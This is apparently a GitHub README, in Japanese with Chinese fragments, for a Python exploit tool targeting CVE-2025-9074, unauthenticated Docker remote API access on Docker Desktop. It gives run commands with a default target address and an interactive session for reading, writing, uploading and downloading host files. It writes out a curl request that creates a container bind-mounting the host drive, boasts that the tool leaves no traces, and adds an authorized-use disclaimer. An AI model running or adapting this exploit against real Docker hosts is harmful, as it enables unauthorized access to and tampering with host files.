
CVE-2025-9074 の脆弱性のセキュリティ研究とテストのための、強力な Docker リモート API エクスプロイトツール。
CVE-2025-9074 の脆弱性のセキュリティ研究とテストのための、強力な Docker リモート API エクスプロイトツールです。
✅ 完全自動のコンテナライフサイクル管理: 一時コンテナを自動作成し、操作完了後に自動クリーンアップして痕跡を残しません
✅ インテリジェントなパス処理: Windows パスを自動的に認識して Docker マウント形式に変換します
✅ 完全自動化された操作フロー: 複雑なコマンドの手動入力は不要で、メニュー形式の対話によりワンクリックでファイル操作を完了します
✅ クロスプラットフォーム互換: Windows および Linux システムを完全にサポートします
コンテナ操作
イメージ管理
ホストファイル操作
CVE-2025-9074 は Docker リモート API のセキュリティ脆弱性であり、攻撃者は Docker API への未承認アクセスにより以下を行うことができます:
requirements.txt を使用してすべての依存関係をインストールします:
pip install -r requirements.txt
または手動でインストール:
pip install requests docker websocket-client
スクリプトを直接実行し、デフォルトの Docker API アドレスを使用します:
python CVE-2025-9074-docker-exploit.py
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375
python CVE-2025-9074-docker-exploit.py [选项]
选项:
-u, --url URL Docker API 地址(默认: http://192.168.65.7:2375)
1. 上传文件到宿主机
请输入本地文件路径: /path/to/local/file.txt
请输入宿主机目标目录: D:/temp
请输入目标文件名 (留空则使用原文件名):
2. 从宿主机下载文件
请输入宿主机文件路径: D:/temp/file.txt
请输入本地保存路径: /tmp
3. 读取宿主机文件内容
请输入宿主机文件路径: D:/temp/file.txt
4. 向宿主机写入文件
请输入宿主机目标目录: D:/temp
请输入文件内容: Hello, World!
本ツールは Windows Docker Desktop のパスマッピングを自動処理します:
| Windows パス | Docker マウントパス |
|---|
対応する入力形式:
D:\ または D:/D:\temp または D:/temp"D:\file.txt"(引用符付き)'D:/file.txt'(引用符付き)⚠️ 重要な注意事項:
Docker API を介してコンテナを作成し、ホストのディスクをマウントします:
curl -X POST "http://<target>:2375/containers/create" \
-H "Content-Type: application/json" \
-d '{
"Image": "python:3.11.7",
"Cmd": ["sleep", "999d"],
"HostConfig": {
"Binds": ["/mnt/host/d:/tmp"]
},
"Tty": true
}'
コンテナ内でコマンドを実行することで、ホストのファイルを読み書きします:
# 写入文件
echo "content" > /tmp/file.txt
# 读取文件
cat /tmp/file.txt
pip install docker websocket-clientpython CVE-2025-9074-docker-exploit.py
CVE-2025-9074-docker-exploit.py
├── 容器管理函数
│ ├── get_containers()
│ ├── display_containers()
│ ├── create_container()
│ ├── stop_container()
│ └── delete_container()
├── 镜像管理函数
│ ├── get_images()
│ ├── display_images()
│ ├── pull_image()
│ └── remove_image()
├── 宿主机文件操作函数
│ ├── upload_file_to_host()
│ ├── download_file_from_host()
│ ├── read_file_from_host()
│ └── write_file_to_host()
└── 工具函数
├── normalize_host_path()
├── create_container_with_mount()
├── start_container()
└── stop_and_remove_container()
Issue と Pull Request をお待ちしています!
このプロジェクトは教育およびセキュリティ研究のみを目的としています。
本ツールは認可されたセキュリティテストおよび教育目的にのみ使用されます。使用者は本ツールの使用に伴うすべての責任とリスクを自ら負担するものとします。著者は、本ツールの濫用または未承認の使用に対して一切の責任を負いません。
D:\ | /mnt/host/d |
D:\temp | /mnt/host/d/temp |
C:\Windows | /mnt/host/c/Windows |
C:\Users\test | /mnt/host/c/Users/test |